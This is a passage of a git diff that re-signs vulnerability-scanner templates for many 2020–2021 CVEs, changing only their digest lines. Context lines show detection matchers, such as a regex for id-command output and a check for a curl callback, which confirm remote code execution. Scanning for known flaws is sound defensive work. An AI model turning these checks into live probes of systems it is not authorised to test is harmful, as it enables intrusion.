490a0046304402202450cd97ccd6437e35260bc6760f8d0d22bcfe0c954e842dc097917c98e04bce0220219b6a7bcfe2f47d2428eae01953e898adef91e82a82ac76fad864729fbc0419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 0d93a8033b..65de4d1037 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -50,4 +50,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a0047304502204ec01dfe89f1f9796f53b43c3f8f9bfff0db4ea3e3eb7da3df8e6f4a15c93004022100a3827d38bc0be92d24eef29752497f720909d1d144850428accdd33dc2a798e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bab5ebb84f2b40789aa2f4c651095367ecf8b4665ec1f4b3f75e96c5765f6287022019534f0ff671a7ef2749ee47ad1a91ed034e31366ea8598dd270b53889840202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index 52d610be30..234fee7c90 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204412ce229c5877288e6faa77220767561a5fca4b8ab2566f23e2d7102706e67b02200cc521198e9c54a98f3bbaaba12c87827328af30704210e8eb388a6a2df98f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6c7cf12108e441278e1069f8877bda6a4df1b63134472603cafe567ea0750f30221009c3c6fce68358b9c44a5a682228ed945e952f82a37f7f6f5d8d1f525576f21c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index e9fb42ee7c..7a9d4e0820 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a2b80e81f9efe58be8ec0d3d891a2338f141a0fe35e0a84de0e7223200f8fdb3022100fa273979e8c86cdf5acb48a0e6efd5b42d10962dcd2b82e270dd8ca259d39c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9cdb256a23fb29cc79afc92af5dfdf974dcc90897da1ac609b1c0135de3c1d9022100d7c106bcf1829aaa0b27e01b7f64812a31aa7464778b826cfc3d965839e42438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index fb637190fc..77e5f87d33 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d1b411ea76e89ae1bbd022c4ab57bac51f3fa12b871736779e3d1a35fd883c0022100a71b8922e865146caede677ee0e73b855ba1dad6aceefa4f667aaea98db2e147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201febe633336547f2a72c06061a612cdf30ffadec7bc448666b09d92b419bdea4022016e56b97e19755bf3787c1c885d905a1e7e11cb6dc1e36a66c6c6c8a5b522ee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 0dcf44ad65..0e2ba0e428 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f1f8769608644c41386a233cb78ccae42d519ed0ec714381e3823a863f658ed602201ec7768a3888515d76ca4ff5c22cc3b1321f45fb03c25603ed94f79898b132b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201102d935d5f0568de929e527b8a79643337300d43ea1d06c8d393897a26846c90220303502d7c3cf8938e0c68e3430c6a195e6fa05b24d1bc68a0d56806aa389cf5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 3d3deabe88..29fd60f485 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e98012a37e1c7449138264fa67d0e0279ae5c6f631e4da99cd419bfc34ce7c0e02204622d06279cc4f997a1f316f033a87f60a7bb8f2219b1b24f27692ca69ed8092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b4839c9662183e844be6af75890ea70fb4cd6e764609151db2fe34feef597f902205575561bae2d0f10da8356d98deb4e71c3ce87a9064ab8b541e4d68416eeb22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 7e9f9b1250..9663db3604 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -42,4 +42,4 @@ http: - "ORA-06512:" - "Request Method:" condition: and -# digest: 4a0a00473045022100ccf3113bbf0b9acac23cb361dc7f354995e653943ccb6f448a8fb6a883c4071302205350ce4634728a65fbf460c2adf249a31f93c769451b8969561f2c1d50f9d980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075e36ab5c487e115ea00c7f220c3c760ddb2a7e2c99cc86a54557fbf27f31a4f022038f3096e089c00be06b58255985930c44d70bd0abab9f21a741b20d247f5713c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 2251099cdf..ab42072945 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210097bd62e865ddc5a66964df63555a520511d79d0a43a5efbe2ec58a057de20434022100b3494688001927c623591a7583963320e5605ace9d2a8dc63c05f693ac3e9297:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdcfd569e8342f214eb384f124611a6176542f3db24e58173519e4add35dcc5e022100dbd0609f9302f7b23418fde669ceac781a5db1d080949ab0f1ba6abf680dfeb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index aca7c1bf66..c884944e53 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502200c88732807072e4a6338643df18beacf7f55f33b12f14afd156a824a3b356fbd022100cf87ad99a473933a67e31655bbb149fa818e982f9a341cd2d84c75cea140afaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0f153fb5b5a5b46aa5888c17fb78097d6c6cdd3b1a8f811af53e076edda7c00022100dc0f8855a7fcb05d0996a28eaccea216b931ee6d9055ba490f128333a5909486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index e838f0fbae..109b73e9ec 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206995e8b04712ff12a7cc6259c6023a6f173a130e97bdbe8eeedb0a48258d92ec02210088b782bfd12b1d37ead9da796f4c265fadd35a83d0fdab5cbc2a3352abb19f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a257f68d7aac9aac5f21f8c40e66cf141b121a49c07feddaf15f26253ee3643022100df7f9ce16f459521c45985041cfb0db3a0f640ab0c98b7b4d5a895233c5f81dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index ad125e7bf5..8f7142b88b 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ecfcc24163fa9d5a764dd7f1d6bc59d23a3cb69c7c3ca9bf2b3d0a9f92d38fba022100f48bd5a9fde0ece8cf3a033e1fde317110d9ef706c9a178ab65cf6f5bad96f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6cc2c1a5f49519c2cb394d6fcc3729f838aa104d51b4f34c63f57f690b0d298022100b20b204f952796dd8d6786c616c72c0ad7ed8cd733afeced43c49c44445271e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 7321ccb97d..5b1c40cd40 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -80,4 +80,4 @@ http: part: body words: - '"jsonrpc":' -# digest: 4a0a0047304502207d2afae99f9b9e0f78952b1cccf9209e11e2cab61e200b590312046dcd5acbfd0221009ae723766dfe0df8dd26b8392a3a3c7a690658e170dc65292bdb3dbe49de9ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d22ba62ffdf5abc541c17a02f6dc85ff7d87bcdcc8e0e9b164afcee24e7121c2022100e14e20422ed6f96ce5495276d43d614fa9e28284fbe7200504d8fe338797e868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 554939b13c..1d4d8e0a8f 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205928b479b0e61672c4d2b20bdeae75d2dba2d325c94c7154aa53b8e88dfc65f202207c82f73333f8276f8f5eb140990b1b92acc361e69b4e1dd8fd134ce4a84b064e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040ee9c4921d9bb639b308cdbac126e72e432e0007630a327aa72c3306de26a050221008e74a90ffb7713a100134f8736b369b84dde3c2d7973cd5613533354313e7aeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 8665fa807e..2aa9ab3a87 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e38f80c4ba37d6ad8f1e127a4526fd195044d8a0beb3acb9716a231adfcb0bb7022019e048850c00a33d4cb35452a239138bd55f8c2b6271a2efbbbca623cba5b449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047a94956d0dce5fbe975b4a114d42b880079fb3bc63eb98ed3c8cd812fb2ae7602206c830f63a53f40ebb1e75f05b66028bd7a139bc67c7cb3b2b12ebf01275be12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index a8b57a3ffb..4a145fedf2 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a88f073b7af18401e8266c452e7918ef64d4ad02c5c4254fa02c8492c8d76b24022100efd86ff7c908c8cf283050af56d5e0a0d3ad3e0ccbf6e83fad3847d18c67d514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059f740a31b60ed89fa96f917d460c88ee8f530001b4a7f379d899dc654d4e1e002210091c3f5cd2ea67e6382a8ed4ee86abb86ff080cb39045dc5cb218b105ba8d67b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 722d97199c..be5aaf0cd2 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -61,4 +61,4 @@ http: regex: - 'base64\,(.*?)" border=' internal: true -# digest: 4b0a00483046022100dd49a706de9b916f92684a08c80476589aa14b407bde15ee8a4cc56622060174022100d77abfdb0134802a565bbd5c593e458978e19bf0ff9973231988835c3199bfe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e2ade4b508b5686bdc54cfab47f238ff3e8fc844a8366b4106961cb92039cc0022042c8c944336adb6a908681f0f573fd55b7edad4d092b8541f59b9cd61d0a5d1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 6aa7cb7021..5b40ce2d30 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220593509be71e4f3c4a93f5218c7615fc4b876c64259f2151d89a663d9d11aa510022100f6a0490be29ac53bcba0d368c4835cfaa80d384c4a9dc507896e7f02f69c17fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd1f32eb36b6035b0ab7f8b1fd9e4f02e325c7e4b474c628e644df44bb3af568022100cfb516b81e4a86ee5ac1a0945ed498edfb269459faacf498d3bada550d236674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 071484bb54..61550d85a1 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022062fbdc0055a5e3028d6b0fc1cd8d72136f750008795a0f5fa47bed7b03f7d2ae0220630d19cd162113ec4c1fab558f6170e0f964f3b697b287d62f4807ed37a54c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e5269fa87351d0696eac2e95e1558c38cd483f64636dfa7e5bc81d5163b7b62202207e03da1ef5a15578b63bcf7eb06bdeb739b2be4c416e405414671458a866eedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 28248f1a86..5be447025c 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b3f1f755c121ccb9a251c16ad6e7453fc09afe729910ba0627eaa855d04e7f70220147595c2aad515d0ffa806be04849a7530d35e3b15e3b587f301e54c4b30f9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220334d3d1d497475f923737b75e9cb56b5d6eef6a7f382f67094e470a31dfd780e0220516f25b00740a8be2a78f7ed4c4900ecf0dc490c0ce18f7a6077f7c52af1c644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 1f81232d74..212528a2d1 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f59adf2060e9bd5cd6778f48d141f1bd0ac128d97a8dde7e931d4f3135d0e887022100f9c874e8c0cc7c2e23d9bd5f892e66fb4e28e818ba92abb6ccc29c10c845173e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203158e583871baabbe12802cc13a547061a472688943ddb5862a8dcd926e6f4e102203e86aded4c5885c971f7f95907d3cd1ebf7e061e61b84f1d317a7eb61eece2e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 3ae73bde55..9404822723 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -63,4 +63,4 @@ http: regex: - '' part: body -# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038ef14fb949ecb26cf6e0bc275a460726d05e4f4ceb3d08e7f7b342100a684e9022100f038da88e0118652d8fadbf5aac6cc91b63489161e655adbe20e75b812e07b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index c9eb02de23..17181f13bd 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022026f2cb4d546143dddc1646a081ebfaeecf087f82b9adc26ae239313b24dc4a4d0221008e2cbba77ac00dde9277de789229bd07830e4a7b7c25c58778ac3c9b1ddeddb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f0a5616189deeabf3e79f051b432366c41cb9047616bab48038d28d6a4a3d4f022100be9594b79e5243c7cd077e3d67335eb3b3e962999dcc5452ca48888a6980a322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index b929baf24f..674c054012 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -46,4 +46,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100a120fefbb36e69c70d4665614d7579e6da2abee8955d5686ba345bf0c8600bdb022100eb3394e9cd130d5934476c1186acd108ebc7cf70016720dc85dc8f8275b2e246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f344e356724b4867ba4fb238497fcff0e4538849f163149d32ad25e30b58cfa022012e555c306ec33d8bc11d345f9698cc61df83b720b151bf6a836531b1880a470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index ab601590d4..ab5ea8fd80 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 400 -# digest: 4a0a0047304502210094de0f55e8db0485dedb6be0b0faaa6737f8e5b40905c4c59b87598da6efa7c502203624957dc717497acf2a1ab8c0aee02060f4b9fc6fd22b24111abb850f2b07ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df8a1aaafef027c9a7ca24c450e8badd81d220552eb1a666e614ad749dc840a1022100b5a9b3f7999c6dcc0a7ecb7faca88b99f4d698e20e00de8db760c1b05f4db7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 163616cab2..00404bf428 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220278c989b9dc1803a0640da64a5a9b5d1f8dc007e0d7b724e3218b431ffc98f2f022100f203b37e7d96545de9a199b34f1bab451c9ec9b3825d84d3ff9db7e9c3694bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093e236295624cdd2b6ddd07e3e2c61ac5127edde64704208f291d22445184eee022100d3dbff486435aa66a098616c46d66f71d61c39433e3d1cc85e7fc90a0d273d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 9311a11cee..ef1406f42d 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d0675892f5cec9c4449982110497fde27efa75037b1885e51f4b4dcf0340a1db022100c191c1f76092756f549a6f2692918433952d4d0a25a3c7f4833c36650fa39e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201053fc6d9eceb86b62e93604a3bb4c29decb102730218d85e6ef2b34a648b3ee022100ae116fb72e469550e5d59d9c19d4f3769e73cd39e1be7a477680fe139e94be0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 978526cbcb..efd063967d 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a8a85ba3feb3fc5625cd71d82087d10be42d642fd896fd5f96a35a9272ddff9402200a01ef82246294f6757e64c15356058aa6d3fc266364ca44ea705b2258a34ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcef1f5ce44b42760b65c7e2db5338fb632c4ccd0bfd4310e82dbe0d770bb5bf02206a043d2ea795f135c9491381f341986b98d0fa25a228fc71601bf71490468d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 046ea30d46..0574b198c8 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -58,4 +58,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 490a00463044022033ebb435f1795b6a06bd29b9bee7de4e687a08dc848035c641304f25a05044420220421167babce74e7aa10b543e135d291d7ec87aeacc8ca03950f34bd210e9ea7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009732ad4945c244188180652f1736283552377e3e7c5f53c278f644613db66669022052df00ef7d96c9f01effd1d88de3f11677afa20ec88ef825437b8ebfd82a3e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 0dcd5d7810..fc37f12b07 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -53,4 +53,4 @@ http: - type: word words: - "We encountered an internal error" -# digest: 490a004630440220193a42a5351b971d266989af20781c196488aca759067dbc1f0e8f2308d5c64802206f9ed4e250e668bc8a8acae05ca9632ea520a07ef3eca8bee272b8bdd6cc44bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e6e0482e52fd2746a9e615d4955f9dfcb23d28c2cd84c11097ae301c481f98a0220315895908f6f6d8106063b05eae0206e8a4b1d6d62b8580dad337f5e740d44c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index e2e9ac43d4..15bc972a3d 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -91,4 +91,4 @@ http: - type: regex regex: - "(u|g)id=.*" -# digest: 4b0a00483046022100dcc24fb2eb777eff956bdecff0f00a86f51d0137fee0f7436e9a61d975a3f83d022100d09f18044914a741d17e4d1c9f15f0c229d19093066f6e7ee379376d585ed0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201d3958e2205541727edfc0220248d3d5bb9bcda9884e707e81a5b962adc9ea8a02203c5be8f6e614ee645c8a09df29eda44f5d8c262c4f4da023266c8c652323cb0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index df6c703fbd..c9271506d0 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 403 -# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5a7a38e72025ea7caccd5390dc5ccf22e5473725508efdf2b1db3e5074996830221008af3661d932d485a489222e268206934fde7cb4e4db9327c708e005ad6fcadc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 93f82c7acb..d24ff609f2 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -133,4 +133,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008cbb90b9662cacdf1efc170626c20af2af061774641c11e1926b782d0821b4d3022008ef1eecb9e827b845861832ce5f2e9b8300d3ac1fedf863de930e3c5b08bec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 809ad1e94d..a3e59d41d6 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0e1b8d49d9fe1a59d88506d5d75e0740c560db375170a3e174b0f722115311a022100fc37abd7b4479a1a735a9447124a0e20493872640be3cca1318a98db23cb9662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100885cd6ea86ca04ca6daedbe83a0849b14dec28669707ea627bc4c28c09150aec022100c2c529caacdd52e2f407a4f5b40faa2511d55958f6151f7b0de27832361574bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index b29c1d6991..5b4343b512 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099094cb8ddabbb62ae1c1a3278524ca37c02baabbb89430ec56c39a6591a9f9a02201e01bb5340f1cec11d2ba496fd3b176816decd82aa4f21cff997ada5c09963fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c6446203bad1ef26dc458b3e075267a212ac9b442e2b33f2b6f98ae9d45ae2902204af8a0a9618ed7288407094e7c2a3d39a8a0d112c94511dac122099868f3dfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 669340fd67..b603fb1d47 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e6426cc572101b45641c767c7e539db75a145714644272d3d163df59b5ea2aa022015d94f5ac290e8fb85ec786f4e590bdf9fe9fbd03a04357cc7dfa9cffa27e110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100887a67cc1c94cc474e1a368816599bc6702e406d95cb2fd1e52a2c13a002424a022100e9ef90a621e53ed008b5289dd3854af921b52f004fe421a07eff2dd2fe659bce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 90883398a6..f24355aa4a 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf3f445ac2523e140ae589eedb4c723a9d60a1d3734ddf47f76c27ceebc054d4022100907ae703851cd94586106cb70d472adad6e98a3ec9113a16e806545245aaf46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c4185e8f7ee6326b23eac3bb68f65bfb4a93391d156182a3e401fa906c9f3e6102201015bf2e1bfb158c19d5a9f9d65c391313584b46b8b20a4d14d5b79d2413bb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 85cb9026c6..c062217bfa 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 